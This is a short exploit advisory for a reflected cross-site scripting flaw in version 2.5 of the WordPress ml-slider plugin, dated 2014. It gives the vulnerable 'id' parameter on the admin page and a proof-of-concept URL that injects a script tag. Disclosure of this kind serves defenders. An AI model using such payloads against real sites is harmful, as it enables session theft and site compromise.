Wordpress ml-slider plugin version 2.5 suffers from a cross site scripting vulnerability.
139a4937e131843a2e87109d4a988f4dbfef2b7b634e0ffe77c5a422ab9d0b2a
######################
# Exploit Title : Wordpress ml-slider 2.5 Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://wordpress.org/plugins/ml-slider
# Software Link : downloads.wordpress.org/plugin/ml-slider.2.5.zip
# Date : 2014-06-27
# Tested on : Windows 7 / Mozilla Firefox
######################
# Location : http://localhost/wp-admin/admin.php?page=metaslider&id=1[xss]
# Exploit:
http://localhost/wp-admin/admin.php?page=metaslider&id=1"/><script>alert(1);</script>
#####################
Discovered By : ACC3SS
#####################